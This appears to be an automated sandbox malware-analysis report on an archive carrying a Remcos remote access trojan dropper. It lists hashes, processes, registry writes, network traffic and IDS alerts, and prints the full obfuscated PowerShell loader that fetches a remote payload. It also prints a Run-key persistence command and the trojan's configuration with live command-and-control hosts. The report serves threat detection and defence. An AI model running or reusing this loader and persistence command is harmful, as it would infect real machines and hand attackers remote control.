| File name: | 16052025_1709_15052025_ProductosGTEH6575785765788980893583535.7z |
| Full analysis: | https://app.any.run/tasks/909c26df-1044-42c4-b122-ad51bcd6207f |
| Verdict: | Malicious activity |
| Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
| Analysis date: | May 16, 2025, 17:16:23 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-rar |
| File info: | RAR archive data, v5 |
| MD5: | 04CB6333AF271583E08E38F5330722B2 |
| SHA1: | 552E6839354957CCD15C058A465EF817A1DBC8E3 |
| SHA256: | A1F228ADB390AD3DB6B16180B60D329F95D32F299C7A8B9D21E3F4BD61F03481 |
| SSDEEP: | 96:0IVljzKIRkjoY0vEd9qRR9goJExR2GVjXEEmLlQO1412k4aghfNizGyVeWUAJZCE:0En7AMBexwG90pJyBIfNxy0W3PvffW10 |
| .rar | | | RAR compressed archive (v5.0) (61.5) |
|---|---|---|
| .rar | | | RAR compressed archive (gen) (38.4) |
| FileVersion: | RAR v5 |
|---|---|
| CompressedSize: | 3986 |
| UncompressedSize: | 6075 |
| OperatingSystem: | Win32 |
| ArchivedFileName: | Productos GTEH6575785765788980893583535.cmd |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1184 | "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;Get-History;$Chalcidicum=[String](Get-Command A:).CommandType;$Varigere='Farbroder';$Chalcidicum+=':';(n`i -p $Chalcidicum -n Udelikateres -value { param ($Forbiser);$Jeanine=4;do {$breraketterne+=$Forbiser[$Jeanine];$Jeanine+=5} until(!$Forbiser[$Jeanine])$breraketterne});(n`i -p $Chalcidicum -n Hannis -value {param ($Stalden);.($Biordene) ($Stalden)});ConvertTo-Html;$Soldrevne=Udelikateres '.aennAdteEAktitTe p.Decrw';$Soldrevne+=Udelikateres ' ofeRendbDa,aCbrahL untIIn.ae SamnUdskT';$Griflens=Udelikateres ' TicMMe eoCh.lzYahwiP,lal CenlSe eaLevn/';$Trafikflyets=Udelikateres 'KuglT Seal C tsFoto1Besg2';$Lockless='Medi[ satNDucke .ent.ejl.Mours Ba eBin RSvogvMegaILigkCFlageOxy pG rdOCeorIDefenStagTAl.eM onaaPalenF.edaMan gUddeEKn.sr hon] Ter:Unde: Ag SOpflETal CTemaUSolbrStemiMarxTOveryFuelPArver Ad O FreTEck OSubacAfgro,utiL H a=Bala$AfbrtForgR picaK miFProviRefokKonsfSyltLTh.aYPatrE sakTStaps';$Griflens+=Udelikateres 'bel 5Soci.Afmo0Au,t Rekr( ,vrW prii OminFistd.lanoNonnwHaa,s Lou MorpNAlmuTLegi Phen1Sepu0Udre.Sprl0 S l;ma h SmidWSustiStepnDial6Unco4Icar; H l erixFors6Olds4 Omk;Soci SkurrReplvIn.e:Ou,l1Expo3Nonf7T.na. K n0Reha)prel AlpeGMasseCu kcTi lkSmidoInte/Sams2Gr,w0 F r1Topm0Mmes0 Da.1N nf0 mi 1In,a F,rrFDiamiSprnr alieIsvifTripoGal xRa,i/Frib1A ro3 Ind7Akt .Alky0';$Hajib108=Udelikateres 'LipoukissS ProESt aru sp-SkudAhof gSrbeeAspin D aT';$Chutzpah=Udelikateres 'ArbehSourtdseltKollpNe.ts.isi: hr /Arbe/TergaS lvv ejsaSnavnCon lPenelLandcSkyl.SheltBvero smap S u/omstF UdhiKautrF ksb,verervbanS peeDoornLoaveFunk. HekpS etsProgm';$modvindene=Udelikateres ' Log>';$Biordene=Udelikateres ' YeriAfbae DecX';$Pedometre='Kalveskind';$Lymphadenosis249='\Fogeders.Boo';Hannis (Udelikateres ' omp$AsocGLil,l.naloDepubSaucABehaLBact:KlokKGrunoTheoDDat nFor IBassN InfgVelpsGuldtAbseeE uaOReinR S di Ve ESustRL geNTeksEShaf=De r$Cleae elan vavbucc:S dda KonpVel P,ogrd CiraUndvT eteAGuds+ S r$acroLP,lyYSna.mCarePArrhH,verAbehfdSt.yE OilNApomoFyg s GaliAnd SDebu2 sl4Pred9');Hannis (Udelikateres ' For$ProsgHaloLAffaOPlurbKendAKryblDaab:VildUBra sthroUNer nRota=.nde$.imiCDeisH,ulfUBedeT TheZ N,cpArguaAngrhImme.,iges,evePFloulP.otISa.dTVeda( ug$A odmIvinoHjerD SmaVTrlsI UneNAmbrdPseuEPeliNMadeePrel)');Hannis (Udelikateres $Lockless);$Chutzpah=$Usun[0];$Unvulgarizes=(Udelikateres 'Anno$ ThigNonsLPorto AktBMesoaWi elPico:Foree TulNSmreEUnseVTropoSponl Ed D olysBadeh Wage FlerLingRHj me Dr DR.sum,mbrmGl ceMar tUnde=PlesN sesEpecowMidb-PsiloPartB ChrJPrisE TrecPosiT obr SubssAlmoYsculs ammT,ense Fy.MPsyc.Rifl$NutgSBuskoSj el randNaisR Dife ,onvGardN IndE');Hannis ($Unvulgarizes);Hannis (Udelikateres 'G nn$HypoE,kkvnBrudeG,nfvU pioKnasl Ac dilmasHel hMja eMedir M,rrDekae StidPaa mU stmResoephentsupu.BallHUncre AssatanddBifoeOverrTiebsFusu[En a$Aim HBrneaRedojPraeiMyocbGr.m1He,e0A.ti8Non,]Prae=unde$HoveGSensr ,iliKaryf HydlTraze TomnF gss');$Saarende=Udelikateres 'Opn DIndio OmgwUdbunNummlR.mmo FaraC redAs rFAllei OpslPse e';$Nondegrading=Udelikateres ' isa$IndkE UndnHek eFor v unkoA sklTrnidRancs onehRe he Al rMyolrPalmeSwisdpowemD cim Ka eovertTils.Farv$l reS otoaSympaBio rStupeAmtsn irod F oe,ysi.CystIRu inForevHem oGrumkAttreAfhu(Desi$ Fr.C LanhMtniuUpant AdfzO tepPoroaIn.ehYnk , aa$ EpiJ adiuD,cid PhodBol oJ ckcScinkMisb2 Sto2,mag8hard)';$Juddock228=$kodningsteorierne;Hannis (Udelikateres ' eri$Bul.GLalllClinOMy tBB rua UnmlAt y:EnsiKUnw OPrjurFaksPRenoSLeukES rvNBa leAtei=Papa( kriTTalbeVaccsAfnot si-HoofpSnkeaP.oatIkonH.ner Insp$ F,rjfremUStokDL,ntDSnnio alaCReddkBeta2unco2O sk8 Ap )');while (!$Korpsene) {Hannis (Udelikateres 'Flad$ Te gDefilSapooAkslbWaxba P rl F.v:RuffWGentrCumiauds t S,shMenieBookdVest=Te e$ prPDel a emnUdtatAfmahLammedenao T,inLatti .ecsEstra QuatTypoi ChaoOkapnGaun2 kue4Chyl5') ;Hannis $Nondegrading;Hannis (Udelikateres 'Sarg[pachtOperhoverR Po E sela.ndeDDollIP len D ggCach.CherTSt.yHCentRsp de hilAKkkeD Mim]Coel:Dyb :He,oSSpexlIsadEWhireMaltpExer(Syl,4runt0Disa0 Bel0 C p)');Hannis (Udelikateres 'Best$ ecG agllCineOAutoBStilA Stel am:SjakKSpriOJambrByggpFkalSLangeVidenp lye Ent= yd(Fo lTmy,tEMillsPhthTP up-Ro epBrenaY unTGhasH Lue C,os$ TiljreleUForfd S hD ryoOvercSke kBlu 2Kdbe2Scl 8Over)') ;Hannis (Udelikateres ' Un $BilogEntoLBar OUd abArkia Stel Kag:VejraHierpHyr,O ejCBiblABookfnectfAdsceAntiID ckNRestePrag=Syst$ResoGL prLUnsuoPhacbAfskA Hell.kse:Pit LEct,A hioUapi REareiLgteT V rESte +Spor+ .or%Diss$ Tv,UEftes ,enu P,unl vs.T,etcUngeoRebiUBifaNCra T') ;$Chutzpah=$Usun[$Apocaffeine]}$Leisters=421435;$trrehjelmen=30453;Hannis (Udelikateres ' For$HermgB.bslCentO InsBSemiAUn,elpleu:SterdkrediRibbSJu.tsCokeeCl.mrBigaSUn o Aff= S a ZonegPredeSinitAabe-GaarC ideoCrypnSpiltKassE eutnSolbtCour M,l$ F.dj.yntUPreaDWinddB.gnOBaudcAcarkSpor2sl,g2Anak8');Hannis (Udelikateres 'Lini$AltegCarilstolo apbBlaaa Hapl.lyp: Fo,OBr wvManieMonirChamhS.eroelecl psydOe.ee icalEmots No,em.rin LabsS.lk mand=Oc,a Dag,[Hob.S ariyNonns.evitF rfeFastmBa,e. S lCEkseoPaavn H,vvMedieKamprPa stUrnm]Moon: Non: BesFPresrOutmo OspmrensBUndea,onfsStabe ,ug6Ra,t4DigeSR,gitElecrUnp iPolynN,ohgAfdr( ree$,oylDAngeibl ds E,fs,andePre rLinesMail)');Hannis (Udelikateres 'Nihi$FadegUdspLJosuOSk pBInd.a Si lCall: josb HacrO slN ComERodehPaknaSmasVPrvee OpskTubbL mmAOp fsUn,is I dEBestLAfskE GarDSi.tEDatorFork Fors=Skyd For[ReseSVi,iYSyvtsFanttRangEIrreMRedi. LystMenuEPolaxAtomtMarm.Gel,eUnseN DksC Re,OJ radForhICharnU engCroo]Paio: de:FiltaPoseS DioCMarlithroi al.AvleGBlueeOmklT CouSPorttoverRKonkI Fron unsGT no(Fa.a$KiltO DatV ArvE knR Be,H .aboDisjL SpedGnssECincLunglsS aaE aponCentsData)');Hannis (Udelikateres 'Pro $Appeg UntlA fyOR ntbPlasa Jenl Spd:K igl,olyePlk.J Ta.lAntiiTeasgHemiH CoweSulpD IntsUtr DPaciIUd aGStraTOv,vs,amf=Hv l$Gld,BTeksrShorN ThyeFrikHCounAfeodv FluEBlaaK R,vlTherAD trsBudgSImpuEHjrelegeleFl gdMulteExtrr Re..bambs CycuHibebU veSCag THaanrPr rIban,NMandG pk(Alle$ TilLMineE Ge.i A gS,onfTundee HunrKl mSDoub, Unv$Rrb t,nfeR .derBiomE BoohLavrJSocieAlmeLContmSp,reImplNInt,)');Hannis $Lejlighedsdigts;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4756 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4976 | REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Tilgngeligheders7" /t REG_EXPAND_SZ /d "%Spejlreflekskameraet244% -windowstyle 2 $Tuberculotrophic=(g`p 'HKCU:\Software\Tvekulsure\').'udlejningskontors';%Spejlreflekskameraet244% ($Tuberculotrophic)" | C:\Windows\SysWOW64\reg.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5608 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6388 | c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle 2 $Tuberculotrophic=(g`p 'HKCU:\Software\Tvekulsure\').'udlejningskontors';c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Tuberculotrophic) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7184 | "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Tilgngeligheders7" /t REG_EXPAND_SZ /d "%Spejlreflekskameraet244% -windowstyle 2 $Tuberculotrophic=(g`p 'HKCU:\Software\Tvekulsure\').'udlejningskontors';%Spejlreflekskameraet244% ($Tuberculotrophic)" | C:\Windows\SysWOW64\cmd.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7364 | "C:\WINDOWS\SysWOW64\msiexec.exe" | C:\Windows\SysWOW64\msiexec.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
Remcos(PID) Process(7364) msiexec.exe C2 (1)nkwujameson.duckdns.org:60736:1nkwujamesonbk.duckdns.org:52082 Botnetnkwu Options Connect_interval1 Install_flagFalse Install_HKCU\RunTrue Install_HKLM\RunTrue Install_HKLM\Explorer\Run1 Install_HKLM\Winlogon\Shell100000 Setup_path%LOCALAPPDATA% Copy_fileremcos.exe Startup_valueFalse Hide_fileFalse Mutex_nameRmc-WAU9LA Keylog_flag0 Keylog_path%LOCALAPPDATA% Keylog_filelogs.dat Keylog_cryptFalse Hide_keylogFalse Screenshot_flagFalse Screenshot_time5 Take_ScreenshotFalse Screenshot_path%APPDATA% Screenshot_fileScreenshots Screenshot_cryptFalse Mouse_optionFalse Delete_fileFalse Audio_record_time5 Audio_path1 Audio_dirMicRecords Connect_delay0 Copy_dirRemcos Keylog_dirremcos | |||||||||||||||
| 7488 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7492 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\16052025_1709_15052025_ProductosGTEH6575785765788980893583535.7z.rar | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\16052025_1709_15052025_ProductosGTEH6575785765788980893583535.7z.rar | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList |
| Operation: | write | Name: | ArcSort |
Value: 32 | |||
| (PID) Process: | (7492) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths |
| Operation: | write | Name: | name |
Value: 256 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3y2vjyny.kzb.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7672 | powershell.exe | C:\Users\admin\AppData\Roaming\Fogeders.Boo | text | |
MD5:BB6D1162739614C25C8564E0122D4705 | SHA256:A48924C98E4BFF299C4C16E190C34FC66BC8EF3AACFBD038D1B976A6936C70A0 | |||
| 7980 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 7672 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:E18E069D4C87D17F21111546E92356F3 | SHA256:EBAD390BBAEE0674AFC1A71832F322172F7C0BC313A1BE970A6BA7D80C1E5DA4 | |||
| 7980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_elynu0kn.ulu.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6388 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mfv4r04f.vrr.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7672 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3ecb0w3t.zpx.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1184 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1kh22dr1.jmo.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1184 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3mgmn5j0.ltj.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7672 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vwh5xici.0bf.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2104 | svchost.exe | GET | 200 | 2.19.11.105:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6668 | RUXIMICS.exe | GET | 200 | 2.19.11.105:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2104 | svchost.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6668 | RUXIMICS.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
7260 | SIHClient.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | — | — | whitelisted |
7260 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
7260 | SIHClient.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
7260 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7260 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | — | — | whitelisted |
7260 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2104 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
6668 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
2104 | svchost.exe | 2.19.11.105:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
6668 | RUXIMICS.exe | 2.19.11.105:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
3216 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
2104 | svchost.exe | 23.219.150.101:80 | www.microsoft.com | AKAMAI-AS | CL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
avanllc.top |
| unknown |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
nkwujameson.duckdns.org |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
— | — | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
— | — | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
7364 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
7364 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |
7364 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |